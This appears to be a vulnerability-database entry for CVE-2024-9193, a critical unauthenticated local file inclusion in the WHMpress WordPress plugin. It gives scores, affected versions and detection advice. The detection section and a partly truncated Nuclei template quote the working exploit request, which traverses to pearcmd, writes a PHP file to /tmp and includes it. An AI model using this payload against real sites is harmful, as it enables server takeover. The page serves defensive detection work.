CVE-2024-9193
Published 2025-02-28
CVE-2024-9193: The WHMpress - WHMCS WordPress Integration Plugin plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including…
Priority: P1 84 · critical · CVSS 3.1: 9.8
CVSS vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 3.11% (86.2th percentile)
The WHMpress - WHMCS WordPress Integration Plugin plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 6.3-revision-0 via the whmpress_domain_search_ajax_extended_results() function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. Utilizing the /admin/services.php file, this can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| creativeon | whmpress_whmcs_wordpress_integration_plugin | <= 6.3-revision-0 | — |
| whmpress | whmcs | < 6.3 | 6.3 |
| whmpress | whmcs | — | — |
Detection & IOCs
url: /wp-admin/admin-ajax.php
command: action=whmpress_action&do=whmpress_domain_search_ajax_extended_results&page_size=1&is_title=no&params[style]=../../../../../../../../../../../usr/local/lib/php/pearcmd
path: /tmp/
- Detect unauthenticated POST requests to /wp-admin/admin-ajax.php containing the parameter 'action=whmpress_action' combined with 'do=whmpress_domain_search_ajax_extended_results'; this is the vulnerable AJAX handler for CVE-2024-9193.
- Monitor for response bodies containing both 'whmpress_action' and 'CHANNEL PEAR.PHP.NET', or 'PEAR_Config', which are indicators of successful pearcmd-based LFI exploitation.
- Monitor WordPress options changes (e.g., default_role set to 'administrator', user_registration enabled) following exploitation, as attackers leverage /admin/services.php to escalate privileges.
- Flag PHP file creation or inclusion from /tmp/ (e.g., /tmp/*.php) on the web server, which is a common second-stage indicator when pearcmd is abused to write and then include a webshell.
- The vulnerability affects WHMpress plugin versions up to and including 6.3-revision-0; ensure version checks are scoped accordingly to avoid false positives on patched installations.
- The attack is unauthenticated (no session or nonce is required), meaning perimeter controls relying on authentication checks will not block exploitation of this endpoint.
CVSS provenance
nvd · v3.1 · 9.8 CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck · 9.8 CRITICAL
GHSA
GHSA-7fmf-f9xm-8gm4 (CWE-98, CRITICAL): The WHMpress - WHMCS WordPress Integration Plugin plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 6…
ghsa_unreviewed · 2025-02-28
VulnCheck
whmpress whmcs: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')
vulncheck · 2024 · CVSS 9.8 · CRITICAL
No detection rules found.
Nuclei
WHMpress <= 6.3-revision-0 - Unauthenticated Local File Inclusion to Arbitrary Options Update
nuclei · CVSS 9.8 · CRITICAL
WHMpress +/tmp/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=whmpress_action&do=whmpress_domain_search_ajax_extended_results&page_size=1&is_title=no&params[style]=../../../../../../../../../../../usr/local/lib/php/pearcmd&
- |
POST /wp-admin/admin-ajax.php?0={{marker}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=whmpress_action&do=whmpress_domain_search_ajax_extended_results&page_size=1&is_title=no&params[style]=../../../../../../../../../../../tmp/{{randstr}}&
matchers:
- type: dsl
dsl:
- 'contains_all(body_1,"whmpress_action","CHANNEL PEAR.PHP.NET")'
- 'contains_all(body_2, "{{randomstr}}", "PEAR_Config")'
condition: and
# digest: 4b0a004830460221008402be345e364d2d6aa6e1eac30e6751ad5b8a
No writeups or analysis indexed.